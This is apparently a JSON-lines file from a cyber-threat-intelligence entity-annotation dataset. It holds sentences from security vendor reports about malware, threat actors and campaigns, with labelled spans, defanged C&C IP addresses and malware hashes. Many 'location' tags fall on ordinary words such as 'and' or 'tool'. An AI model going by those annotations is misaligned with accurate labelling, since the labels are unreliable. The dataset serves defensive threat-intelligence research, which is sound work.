2013)","entities":[{"id":28138,"label":"threat-actor","start_offset":126,"end_offset":130},{"id":28140,"label":"malware","start_offset":172,"end_offset":176},{"id":28141,"label":"location","start_offset":177,"end_offset":184},{"id":28142,"label":"location","start_offset":185,"end_offset":189},{"id":28143,"label":"location","start_offset":206,"end_offset":212},{"id":28145,"label":"location","start_offset":248,"end_offset":255}],"relations":[],"Comments":[]} {"id":2600,"text":"To this end, we are aware of this actor\u2019s involvement in vishing, SIM-swapping and soliciting third parties at providers for insider access.","entities":[],"relations":[],"Comments":[]} {"id":2187,"text":"In this attack, attackers embedded the TDrop2 malware inside a legitimate video software package hosted on the software distributor\u2019s website.","entities":[{"id":45419,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} {"id":11704,"text":"Non-malicious applications \u201cMy First APP\u201d and \u201cOpinion Poll\u201d Another two applications were built from JavaPayload for Metasploit that will load extra code from the remote server configured in the sample.","entities":[{"id":36069,"label":"location","start_offset":42,"end_offset":45},{"id":36072,"label":"malware","start_offset":122,"end_offset":132},{"id":36073,"label":"location","start_offset":138,"end_offset":142},{"id":36074,"label":"location","start_offset":143,"end_offset":147},{"id":36075,"label":"location","start_offset":168,"end_offset":174},{"id":36076,"label":"location","start_offset":200,"end_offset":206}],"relations":[],"Comments":[]} {"id":5088,"text":"In other cases, we observed fake websites \u2014 already set up to distribute trojanized cryptocurrency applications \u2014 hosting iframes and pointing their visitors to the exploit kit.","entities":[],"relations":[],"Comments":[]} {"id":5356,"text":"The MTD provides an abstraction layer to access the device's flash memory.","entities":[],"relations":[],"Comments":[]} {"id":779,"text":"From a researchers' point of view, deferred free created a few problems, one of the major ones being that the page heap feature may not work correctly.","entities":[],"relations":[],"Comments":[]} {"id":5335,"text":"10 bytes are then written to the core component pipe.","entities":[],"relations":[],"Comments":[]} {"id":4768,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} {"id":13783,"text":"An unusual Waterbear infection chain","entities":[],"relations":[],"Comments":[]} {"id":8876,"text":"If the creation of the tool, batch file, and scheduled task is disregarded, it would seem that there is no connection between PlugX and the execution of the auxiliary tool.","entities":[{"id":27454,"label":"location","start_offset":23,"end_offset":27},{"id":27455,"label":"location","start_offset":41,"end_offset":44},{"id":27456,"label":"attack-pattern","start_offset":45,"end_offset":59},{"id":27457,"label":"location","start_offset":118,"end_offset":125},{"id":27458,"label":"malware","start_offset":126,"end_offset":131},{"id":27459,"label":"location","start_offset":132,"end_offset":135},{"id":27460,"label":"location","start_offset":167,"end_offset":171}],"relations":[],"Comments":[]} {"id":9430,"text":"This is done by hooking NTDLL APIs such as NtQueryAttributesFile, NtOpenFile, NtCreateSection, NtMapViewOfSection, NtQuerySection and ZwClose.","entities":[{"id":29017,"label":"attack-pattern","start_offset":16,"end_offset":23},{"id":29018,"label":"location","start_offset":130,"end_offset":133}],"relations":[],"Comments":[]} {"id":5486,"text":"He claimed that he wasn\u2019t able to install the app.","entities":[],"relations":[],"Comments":[]} {"id":13662,"text":"How accounts are targeted for phishing attacks","entities":[{"id":42527,"label":"attack-pattern","start_offset":30,"end_offset":38}],"relations":[],"Comments":[]} {"id":5555,"text":" It goes without saying that you should keep a close eye on your card statements\/bank account at all times \u2013 watching out even for small amounts that hackers may be making to test if your card is still active.","entities":[],"relations":[],"Comments":[]} {"id":352,"text":"Yesterday, TrustedSec, a security consultancy based on Ohio, wrote that the recent breach at Community Health Systems (CHS) was the result of exploitation of the Heartbleed OpenSSL vulnerability (CVE-2014-0160).","entities":[{"id":46042,"label":"TIME","start_offset":0,"end_offset":9},{"id":46043,"label":"identity","start_offset":11,"end_offset":21},{"id":46044,"label":"location","start_offset":55,"end_offset":59},{"id":46045,"label":"identity","start_offset":93,"end_offset":123},{"id":46047,"label":"vulnerability","start_offset":196,"end_offset":209},{"id":46046,"label":"vulnerability","start_offset":162,"end_offset":194}],"relations":[],"Comments":[]} {"id":5821,"text":"Ed:","entities":[],"relations":[],"Comments":[]} {"id":6628,"text":"A recent report uncovered this threat group\u2019s attack infrastructure, which leveraged commercial VPN providers in addition to compromised systems to use as proxies to further mask their origins.","entities":[{"id":20569,"label":"threat-actor","start_offset":174,"end_offset":178}],"relations":[],"Comments":[]} {"id":6398,"text":" Examining additional connections to port 443 on 159.65.186[.]50, we identified several suspected victims including an Argentinian organization, an IP television provider providing North and South American content, and a major textile manufacturer in Mexico.","entities":[{"id":19849,"label":"IPV4","start_offset":49,"end_offset":64},{"id":19852,"label":"location","start_offset":206,"end_offset":213},{"id":19853,"label":"location","start_offset":215,"end_offset":218},{"id":19854,"label":"location","start_offset":221,"end_offset":226}],"relations":[],"Comments":[]} {"id":8801,"text":"In one example, attackers impersonated McAfee.","entities":[],"relations":[],"Comments":[]} {"id":459,"text":" Attackers use DGA so that they can quickly switch the domains that they\u2019re using for the malware attacks.","entities":[],"relations":[],"Comments":[]} {"id":13112,"text":" Tags APT & Targeted Attacks | IoT | Expert Perspective | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":14043,"text":"There seems to be a neat way to do it, but I seek advice from experienced people.\u201d","entities":[],"relations":[],"Comments":[]} {"id":13119,"text":"Marketplace Vendor Insights takes the pain out of due diligence by delivering the information prospective customers need\u2014reducing friction and accelerating the journey to cloud security.","entities":[],"relations":[],"Comments":[]} {"id":279,"text":"Unlike a new malware family or vulnerability in the wild, the attacks we expect could come in many forms.","entities":[],"relations":[],"Comments":[]} {"id":7715,"text":" Figure 11. .LNK embedded in the .ISO file","entities":[],"relations":[],"Comments":[]} {"id":4583,"text":"More startling is the fact that 18.6% of all disclosures were published without a fix from the vendor\u2014another record-breaking stat.","entities":[],"relations":[],"Comments":[]} {"id":874,"text":" The following sample is used for analysis: Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":5726,"text":" Spear phishing, like the name implies, is a more targeted form of phishing which incorporates a theme directly related to the target.","entities":[{"id":17696,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":17697,"label":"attack-pattern","start_offset":67,"end_offset":75},{"id":17698,"label":"location","start_offset":127,"end_offset":133}],"relations":[],"Comments":[]} {"id":1133,"text":" With over hundreds of thousands of malware associations, this specific mutex is associated exclusively with the Net-worm:W32\/Allaple malware family which has been around since 2006 but continues to propagate and reinvent itself through the years.","entities":[{"id":46569,"label":"malware","start_offset":113,"end_offset":133},{"id":46570,"label":"TIME","start_offset":177,"end_offset":181}],"relations":[],"Comments":[]} {"id":1096,"text":"This is because IE will completely destroy your edits when it writes its new version of the file over yours.","entities":[{"id":46567,"label":"SOFTWARE","start_offset":16,"end_offset":18}],"relations":[],"Comments":[]} {"id":882,"text":"All data sent via HTTP POST requests is sent in the clear.","entities":[],"relations":[],"Comments":[]} {"id":8163,"text":" deb-cn.net ap1-acl.net m s-db.net","entities":[],"relations":[],"Comments":[]} {"id":13972,"text":"Further complicating the issue is the growing scope and scale of attacks today that are successfully targeting the seams between these layers.","entities":[],"relations":[],"Comments":[]} {"id":14412,"text":"An XDR that supports advanced detection capabilities can identify correlate data across areas to identify events that would otherwise go unnoticed.","entities":[{"id":47170,"label":"SOFTWARE","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} {"id":10504,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} {"id":3751,"text":"In most cases, the exploit was only used to drop the payload, however the payloads themself did not contain CVE-2022-22954 exploits for further propagation.","entities":[{"id":49579,"label":"vulnerability","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} {"id":8488,"text":"Pay close attention to unrecognized network traffic (both inbound and outbound) and watch for sophisticated new phishing attacks.","entities":[{"id":26173,"label":"location","start_offset":66,"end_offset":69},{"id":26174,"label":"location","start_offset":80,"end_offset":83},{"id":26175,"label":"attack-pattern","start_offset":112,"end_offset":120}],"relations":[],"Comments":[]} {"id":11078,"text":"We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina.","entities":[],"relations":[],"Comments":[]} {"id":5327,"text":"Data transferring","entities":[],"relations":[],"Comments":[]} {"id":3446,"text":"We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.","entities":[],"relations":[],"Comments":[]} {"id":5359,"text":"The mtd_data_t structure The data is read to this structure.","entities":[],"relations":[],"Comments":[]} {"id":6119,"text":"The registrant information associated with the website hosting the malware is a domain reseller.","entities":[],"relations":[],"Comments":[]} {"id":828,"text":"As a member of the Microsoft Active Protections Program (MAPP) program, Palo Alto Networks received early details of the vulnerability, providing greater understanding of the threat, which helps us implement strong product coverage.","entities":[{"id":46378,"label":"identity","start_offset":19,"end_offset":62},{"id":44876,"label":"identity","start_offset":72,"end_offset":90}],"relations":[],"Comments":[]} {"id":4517,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50316,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":7271,"text":"It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file.","entities":[],"relations":[],"Comments":[]} {"id":3283,"text":"The malicious actor can connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} {"id":13095,"text":" Robots are a particular risk\u2014not only because so much of modern manufacturing relies on them, but also because many of these machines rely on legacy technology dating back decades.","entities":[],"relations":[],"Comments":[]} {"id":1755,"text":"However, he had to heavily redact this information due to an agreement between himself and Microsoft.","entities":[{"id":45122,"label":"identity","start_offset":91,"end_offset":100}],"relations":[],"Comments":[]} {"id":730,"text":" The four critical vulnerabilities discovered by security researchers from Wiz include one unauthenticated remote code execution (RCE) and three privilege escalation vulnerabilities. Dubbed OMIGOD, the four vulnerabilities were found to directly affect Azure cloud instances using the following Azure services: Prisma Cloud Compute Defender agents can detect whether any Azure system is vulnerable to any of the four CVEs.","entities":[{"id":46306,"label":"attack-pattern","start_offset":91,"end_offset":135},{"id":46311,"label":"SOFTWARE","start_offset":313,"end_offset":342},{"id":46307,"label":"attack-pattern","start_offset":145,"end_offset":165},{"id":46309,"label":"SOFTWARE","start_offset":254,"end_offset":265},{"id":46310,"label":"SOFTWARE","start_offset":296,"end_offset":310},{"id":46313,"label":"SOFTWARE","start_offset":373,"end_offset":378},{"id":46308,"label":"vulnerability","start_offset":191,"end_offset":197}],"relations":[],"Comments":[]} {"id":13629,"text":"A packetFlag \u201cxy\u201d was found inside this Gh0st RAT variant This Gh0st RAT variant implements additional features for stealing QQ messenger user information, for example, a list of users on a given machine and their QQ messenger numbers.","entities":[{"id":51715,"label":"malware","start_offset":67,"end_offset":76},{"id":51714,"label":"malware","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} {"id":3030,"text":"Make sure you only give fobs to people that you trust.","entities":[],"relations":[],"Comments":[]} {"id":3583,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":14309,"text":"Like the Android Maikspy, it first sends a notification to its C&C server to register the device.","entities":[{"id":48530,"label":"SOFTWARE","start_offset":9,"end_offset":17},{"id":48531,"label":"malware","start_offset":17,"end_offset":24},{"id":48532,"label":"Infrastucture","start_offset":63,"end_offset":73}],"relations":[{"id":445,"from_id":48531,"to_id":48532,"type":"beacons-to"}],"Comments":[]} {"id":748,"text":"They followed that up In July by implementing a deferred free method to solve the freeing issue of use-after-free bugs.","entities":[{"id":46342,"label":"TIME","start_offset":25,"end_offset":29},{"id":46343,"label":"attack-pattern","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} {"id":1784,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3224,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":4197,"text":"Indicator Removal on Host: Timestomp Credential Access T1003.001 OS Credential Dumping: LSASS Memory T1552.002","entities":[{"id":50001,"label":"attack-pattern","start_offset":27,"end_offset":64},{"id":50002,"label":"attack-pattern","start_offset":65,"end_offset":110}],"relations":[],"Comments":[]} {"id":11220,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} {"id":2449,"text":"Table 1 shows the parameters that the webshell saved to the server would use for authentication and command and how many times we saw them.","entities":[],"relations":[],"Comments":[]} {"id":2623,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. DEV-0537 criminal actor targeting organizations for data exfiltration and destruction A Closer Look","entities":[{"id":47799,"label":"identity","start_offset":1,"end_offset":19},{"id":47800,"label":"threat-actor","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} {"id":12370,"text":"In the threat actor toolkit, different types of attacks are used for different purposes: Phishing campaigns can be used like a scalpel\u2014targeting specific groups or individuals with personalized lures that are more likely to trick them into taking action (like clicking on a malware link), while DDoS attacks are more like a hatchet\u2014disrupting or blocking a site or a service entirely.","entities":[{"id":38428,"label":"location","start_offset":56,"end_offset":59},{"id":38429,"label":"attack-pattern","start_offset":89,"end_offset":97},{"id":38430,"label":"location","start_offset":108,"end_offset":111},{"id":38431,"label":"location","start_offset":205,"end_offset":208},{"id":38432,"label":"location","start_offset":214,"end_offset":220},{"id":38433,"label":"location","start_offset":230,"end_offset":234},{"id":38434,"label":"location","start_offset":247,"end_offset":253},{"id":38435,"label":"location","start_offset":308,"end_offset":311}],"relations":[],"Comments":[]} {"id":14060,"text":"Both use different samples for the multiple malware downloaded.","entities":[],"relations":[],"Comments":[]} {"id":9968,"text":"Malicious update files are prepared, signed with the stolen certificate, and uploaded to the attacker\u2019s server (207[.]148[.]94[.]157).","entities":[{"id":30441,"label":"location","start_offset":23,"end_offset":26},{"id":30442,"label":"location","start_offset":73,"end_offset":76},{"id":30443,"label":"IPV4","start_offset":112,"end_offset":132}],"relations":[],"Comments":[]} {"id":13181,"text":"The encrypted USBferry malware is embedded in the loader resource section, and the loader drops it into the C:\\Users\\Public\\Documents\\Flash folder and names it flash.dat","entities":[{"id":41131,"label":"malware","start_offset":14,"end_offset":22},{"id":41132,"label":"location","start_offset":66,"end_offset":73},{"id":41133,"label":"location","start_offset":75,"end_offset":78},{"id":41134,"label":"location","start_offset":147,"end_offset":150}],"relations":[],"Comments":[]} {"id":12280,"text":"If you have communicated with any of these accounts or visited the actors\u2019 blog, we suggest you review your systems for the IOCs provided below.","entities":[],"relations":[],"Comments":[]} {"id":3579,"text":"The following source code screenshot shows how this is implemented.","entities":[],"relations":[],"Comments":[]} {"id":2141,"text":"As always, we are monitoring the situation closely and will provide additional details as they become available. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":5172,"text":"This technology is situated at the beginning of the supply chain as a layer that connects, controls, and monitors applications, sensors, and actuators, aimed at maintaining interoperability and fault tolerance.","entities":[],"relations":[],"Comments":[]} {"id":14249,"text":"Here is a timeline of when the C&C server\u2019s IP addresses were first used, based on our monitoring: Figure 6: Timeline of the C&C server\u2019s IP addresses C&C Servers","entities":[],"relations":[],"Comments":[]} {"id":3108,"text":"This has more in common with the Heartbleed event of 2014.","entities":[{"id":48254,"label":"vulnerability","start_offset":33,"end_offset":43},{"id":48255,"label":"TIME","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} {"id":14248,"text":"The earliest activity we tracked on the GitHub account was from August 17, 2016, with the most recent in March 12, 2017.","entities":[{"id":48442,"label":"TIME","start_offset":64,"end_offset":79},{"id":48443,"label":"TIME","start_offset":105,"end_offset":119},{"id":48441,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":1760,"text":"Yu Yang then pasted his shellcode that used similar methods to run arbitrary code, showing that the method Yuki Chen used is exactly the one that won Yu the $100,000 award.","entities":[{"id":46910,"label":"identity","start_offset":0,"end_offset":7},{"id":46911,"label":"identity","start_offset":107,"end_offset":116},{"id":46912,"label":"identity","start_offset":150,"end_offset":152}],"relations":[],"Comments":[]} {"id":13849,"text":"Side-Loading T1073 Uses modified legitimate DLL to load the malicious DLL Process Injection T1055 Injects the decrypted payload into svchost.exe process Exfiltration Exfiltration Over Command and Control Channel T1041","entities":[{"id":42934,"label":"location","start_offset":53,"end_offset":57},{"id":42935,"label":"attack-pattern","start_offset":76,"end_offset":93},{"id":42936,"label":"attack-pattern","start_offset":168,"end_offset":213}],"relations":[],"Comments":[]} {"id":253,"text":"Our teams at Palo Alto Networks will continue monitoring domain squatting attacks and work to protect customers against them.","entities":[{"id":45949,"label":"identity","start_offset":13,"end_offset":31},{"id":45950,"label":"attack-pattern","start_offset":57,"end_offset":81}],"relations":[],"Comments":[]} {"id":9757,"text":"But the last layer is the main backdoor body.","entities":[],"relations":[],"Comments":[]} {"id":2746,"text":"Normal PAN-OS maintenance release updates will provide a fix for the vulnerability.","entities":[{"id":47992,"label":"SOFTWARE","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} {"id":13964,"text":"Detailed solutions can be found in our knowledge base article on DarkSide ransomware.","entities":[{"id":43290,"label":"malware","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} {"id":13996,"text":"While analyzing the technical details of this malware, which includes two new espionage backdoors, we noticed striking similarities to other malware attributed to the threat actor known as APT37, also known as Reaper or Group 123.","entities":[{"id":48781,"label":"threat-actor","start_offset":188,"end_offset":194},{"id":48782,"label":"threat-actor","start_offset":210,"end_offset":217},{"id":48783,"label":"threat-actor","start_offset":220,"end_offset":229}],"relations":[{"id":461,"from_id":48781,"to_id":48782,"type":"duplicate-of"},{"id":462,"from_id":48781,"to_id":48783,"type":"duplicate-of"}],"Comments":[]} {"id":2383,"text":"Both StealthMutant and StealthVector contain a payload of either the Cobalt Strike beacon or ScrambleCross, a newly discovered backdoor.","entities":[{"id":47445,"label":"malware","start_offset":5,"end_offset":18},{"id":47448,"label":"malware","start_offset":93,"end_offset":106},{"id":47446,"label":"malware","start_offset":23,"end_offset":36},{"id":47447,"label":"tools","start_offset":69,"end_offset":82}],"relations":[{"id":326,"from_id":47446,"to_id":47447,"type":"uses"},{"id":327,"from_id":47446,"to_id":47448,"type":"uses"},{"id":328,"from_id":47445,"to_id":47447,"type":"uses"},{"id":329,"from_id":47445,"to_id":47448,"type":"uses"}],"Comments":[]} {"id":513,"text":"Virlock has the largest number of variants due to its file-infector-like behavior.","entities":[{"id":46145,"label":"attack-pattern","start_offset":54,"end_offset":81},{"id":44760,"label":"malware","start_offset":0,"end_offset":7}],"relations":[{"id":159,"from_id":44760,"to_id":46145,"type":"uses"}],"Comments":[]} {"id":4675,"text":"StartsWith(\"Help us protect you: Security advice from Google\")","entities":[],"relations":[],"Comments":[]} {"id":415,"text":"And for shoppers, the impact of a successful attack is minimal: there are no lasting effects or impact, making it an annoyance at worst. But because of the potential impact on holiday shopping and the ease of attacks, unauthorized coin mining is an attack that retailers need to be aware of and take active steps for prevention this holiday season.","entities":[{"id":46113,"label":"attack-pattern","start_offset":219,"end_offset":243}],"relations":[],"Comments":[]} {"id":12046,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":37269,"label":"location","start_offset":10,"end_offset":14},{"id":37270,"label":"location","start_offset":89,"end_offset":95},{"id":37271,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":13600,"text":"(Note that Flash has been declared end-of-life by Adobe since December 31, 2020.) If the victim downloads and executes the installer downloaded from this page, the victim will be infected with a variant of Gh0stRat malware, previously also named Gh0stCringe or CineregRAT.","entities":[{"id":51687,"label":"TIME","start_offset":62,"end_offset":79},{"id":51688,"label":"malware","start_offset":207,"end_offset":215},{"id":51689,"label":"malware","start_offset":247,"end_offset":258},{"id":51690,"label":"malware","start_offset":262,"end_offset":272}],"relations":[{"id":1133,"from_id":51688,"to_id":51689,"type":"related-to"},{"id":1134,"from_id":51688,"to_id":51690,"type":"related-to"}],"Comments":[]} {"id":7951,"text":"This method has several stages:","entities":[],"relations":[],"Comments":[]} {"id":14234,"text":"In fact, we found references to PlugX in the C&C strings we analyzed, indicating that the group may also be using the same backdoor in this particular campaign.","entities":[{"id":44021,"label":"malware","start_offset":32,"end_offset":37}],"relations":[],"Comments":[]} {"id":2516,"text":" The FBI has connected Conti to more than 400 cyberattacks against organizations worldwide, three-quarters of which are based in the U.S., with demands as high as $25 million.","entities":[{"id":47712,"label":"threat-actor","start_offset":23,"end_offset":28},{"id":47713,"label":"location","start_offset":133,"end_offset":137},{"id":47711,"label":"identity","start_offset":5,"end_offset":8}],"relations":[{"id":343,"from_id":47712,"to_id":47713,"type":"targets"}],"Comments":[]} {"id":12849,"text":"A security professional can leverage MITRE ATT&CK to audit for coverage gaps to discover where they may be vulnerable to threats.","entities":[{"id":40046,"label":"location","start_offset":2,"end_offset":10},{"id":40047,"label":"location","start_offset":24,"end_offset":27},{"id":40048,"label":"malware","start_offset":28,"end_offset":36},{"id":40050,"label":"location","start_offset":100,"end_offset":103}],"relations":[],"Comments":[]} {"id":14370,"text":"End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro\u2122 Mobile Security for Android\u2122 which is also available on Google Play.","entities":[],"relations":[],"Comments":[]} {"id":1547,"text":" The figure below shows an example.","entities":[],"relations":[],"Comments":[]} {"id":13346,"text":"How a scheduled task delivers the malware to a victim's environment","entities":[{"id":41531,"label":"attack-pattern","start_offset":6,"end_offset":20}],"relations":[],"Comments":[]} {"id":619,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":5437,"text":"In such cases, an average user would not have the ability to fix a Cyclops Blink infection.","entities":[{"id":51436,"label":"malware","start_offset":67,"end_offset":80}],"relations":[],"Comments":[]} {"id":8276,"text":"Some of these domains were also tied to banking malware, confirming our attacker was not limited to embassies.","entities":[],"relations":[],"Comments":[]} {"id":1978,"text":"It should be noted that if you want modify the \u201cCookieSize\u201c value, you should modify the other length fields to keep the packet structure valid, as shown below in Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":11762,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google\u2019s naming), and Kantal (Google\u2019s naming) which shares code similarity with Vidar.","entities":[{"id":36265,"label":"malware","start_offset":79,"end_offset":86},{"id":36272,"label":"location","start_offset":161,"end_offset":164}],"relations":[],"Comments":[]} {"id":13704,"text":"As a result, traditional security solutions won\u2019t be able to protect accounts and systems from such attacks.","entities":[],"relations":[],"Comments":[]} {"id":568,"text":"The attacker asked for $250 and required payment as 0.004 BTC (suggesting that at the time the ransom note was written, 1 BTC equaled approximately $62,500).","entities":[],"relations":[],"Comments":[]} {"id":5029,"text":"These phishing domains have been blocked through Google Safe Browsing \u2013 a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":51097,"label":"SOFTWARE","start_offset":49,"end_offset":69}],"relations":[],"Comments":[]} {"id":2346,"text":"The exploit worked and ran our bash script as root.","entities":[],"relations":[],"Comments":[]} {"id":9321,"text":" Figure 5. Magecart Group 11 injection pattern Figure 6.","entities":[{"id":28763,"label":"threat-actor","start_offset":11,"end_offset":19}],"relations":[],"Comments":[]} {"id":988,"text":" Acknowledgement We greatly appreciate the help from Rongbo Shao from Palo Alto Networks in working on the Threat Prevention signature.","entities":[{"id":46482,"label":"identity","start_offset":71,"end_offset":89},{"id":46483,"label":"identity","start_offset":54,"end_offset":65}],"relations":[],"Comments":[]} {"id":942,"text":"Background WildFire captures many samples of mobile malware that intercept and upload SMS messages.","entities":[{"id":44908,"label":"identity","start_offset":12,"end_offset":20}],"relations":[],"Comments":[]} {"id":5241,"text":"AnubisSpy has several modules, each of which has a separate role.","entities":[{"id":51275,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4752,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[],"relations":[],"Comments":[]} {"id":14218,"text":"Although gzwrite64 is imported by loadperf.dll, the payload\u2019s main function is actually located in the DLLMain of \u201cloadoerf.ini\u201d.","entities":[{"id":48244,"label":"FILEPATH","start_offset":115,"end_offset":127},{"id":48246,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":48247,"label":"SOFTWARE","start_offset":9,"end_offset":19}],"relations":[],"Comments":[]} {"id":14361,"text":"The following figures show how Maikspy variants from 2016 to 2018 are connected to C&C servers (found in this appendix, along with the Android and Windows hashes) used by the attackers: Figure 20.","entities":[{"id":51783,"label":"malware","start_offset":31,"end_offset":38},{"id":51784,"label":"SOFTWARE","start_offset":135,"end_offset":142},{"id":51785,"label":"SOFTWARE","start_offset":147,"end_offset":154}],"relations":[],"Comments":[]} {"id":4207,"text":"This time, the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.","entities":[],"relations":[],"Comments":[]} {"id":5478,"text":"The chat logs shed light on the social engineering used by the operators to persuade victims to install the cyberespionage malware on their Android devices.","entities":[{"id":51470,"label":"SOFTWARE","start_offset":140,"end_offset":147},{"id":51469,"label":"attack-pattern","start_offset":32,"end_offset":50}],"relations":[],"Comments":[]} {"id":3249,"text":"This file contains the victim ID assigned by the command-and-control (C&C) server.","entities":[],"relations":[],"Comments":[]} {"id":10468,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} {"id":3514,"text":"Protux:","entities":[{"id":10643,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":1290,"text":"It attempts to obtain a handle to this window using the FindWindowW API call and then proceeds to send the following command to this executable.","entities":[],"relations":[],"Comments":[]} {"id":3359,"text":"Indicators of Compromise (IoCs) SHA256 Filename Note Analysis 84fbf74896d2a1b62d73b9a5d0be2f627d522fc811fe08044e5485492d2d4249 big.txt BIOPASS RAT Python Script (Version 3) TrojanSpy.Python.BIOPASS.A f3c96145c9d6972df265e12accfcd1588cee8af1b67093011e31b44d0200871f c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A 0f8a87ca5f94949904804442c1a0651f99ba17ecf989f46a3b2fde8de455c4a4 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A d8b1c4ad8f31c735c51cb24e9f767649f78ef5c571769fbaac9891c899c33444 c1222.txt BIOPASS RAT Python Script (C1222 module) ","entities":[{"id":10167,"label":"SHA1","start_offset":71,"end_offset":135},{"id":10168,"label":"malware","start_offset":146,"end_offset":157},{"id":10169,"label":"SHA1","start_offset":213,"end_offset":277},{"id":10170,"label":"malware","start_offset":290,"end_offset":301},{"id":10171,"label":"SHA2","start_offset":357,"end_offset":421},{"id":10172,"label":"malware","start_offset":434,"end_offset":445},{"id":10173,"label":"SHA2","start_offset":501,"end_offset":565},{"id":10174,"label":"malware","start_offset":578,"end_offset":589},{"id":48970,"label":"FILEPATH","start_offset":137,"end_offset":144},{"id":48972,"label":"FILEPATH","start_offset":279,"end_offset":288},{"id":48975,"label":"malware","start_offset":476,"end_offset":499},{"id":48976,"label":"FILEPATH","start_offset":567,"end_offset":576},{"id":48974,"label":"FILEPATH","start_offset":423,"end_offset":432},{"id":48971,"label":"malware","start_offset":185,"end_offset":211},{"id":48973,"label":"malware","start_offset":332,"end_offset":355}],"relations":[{"id":516,"from_id":10167,"to_id":10168,"type":"indicates"},{"id":517,"from_id":48970,"to_id":10168,"type":"indicates"},{"id":519,"from_id":48970,"to_id":10167,"type":"duplicate-of"},{"id":520,"from_id":10168,"to_id":48971,"type":"duplicate-of"},{"id":521,"from_id":10169,"to_id":10170,"type":"indicates"},{"id":522,"from_id":48972,"to_id":10170,"type":"indicates"},{"id":523,"from_id":48972,"to_id":10169,"type":"duplicate-of"},{"id":524,"from_id":48973,"to_id":10170,"type":"duplicate-of"},{"id":525,"from_id":10171,"to_id":10172,"type":"indicates"},{"id":526,"from_id":48974,"to_id":10172,"type":"indicates"},{"id":527,"from_id":48975,"to_id":10172,"type":"duplicate-of"},{"id":528,"from_id":48974,"to_id":10171,"type":"duplicate-of"},{"id":529,"from_id":10173,"to_id":10174,"type":"indicates"},{"id":530,"from_id":48976,"to_id":10174,"type":"indicates"},{"id":531,"from_id":48976,"to_id":10173,"type":"duplicate-of"}],"Comments":[]} {"id":5203,"text":"Scope","entities":[],"relations":[],"Comments":[]} {"id":2650,"text":"The ransomware note was also used to recruit insiders from victim organizations.","entities":[],"relations":[],"Comments":[]} {"id":8825,"text":"For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.","entities":[{"id":27338,"label":"attack-pattern","start_offset":94,"end_offset":107},{"id":27341,"label":"location","start_offset":163,"end_offset":167},{"id":27343,"label":"location","start_offset":176,"end_offset":179},{"id":27344,"label":"location","start_offset":242,"end_offset":245}],"relations":[],"Comments":[]} {"id":4079,"text":"Hence, the command will be this format: `[`] HTShell currently supports three different backdoor functions, shown here: Command code Function 0 Open a command shell for command execution 1","entities":[{"id":49915,"label":"malware","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":9023,"text":"Lazarus\u2019 backend logs also record victim IP addresses.","entities":[],"relations":[],"Comments":[]} {"id":7703,"text":"The encrypted sample \u2014 via XOR encoding\/URL encoding \u2014 also received a response from the C&C encrypted with XOR.","entities":[{"id":23942,"label":"location","start_offset":14,"end_offset":20},{"id":23943,"label":"attack-pattern","start_offset":40,"end_offset":52}],"relations":[],"Comments":[]} {"id":665,"text":"In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint, some we\u2019ve already posted about before, and some are 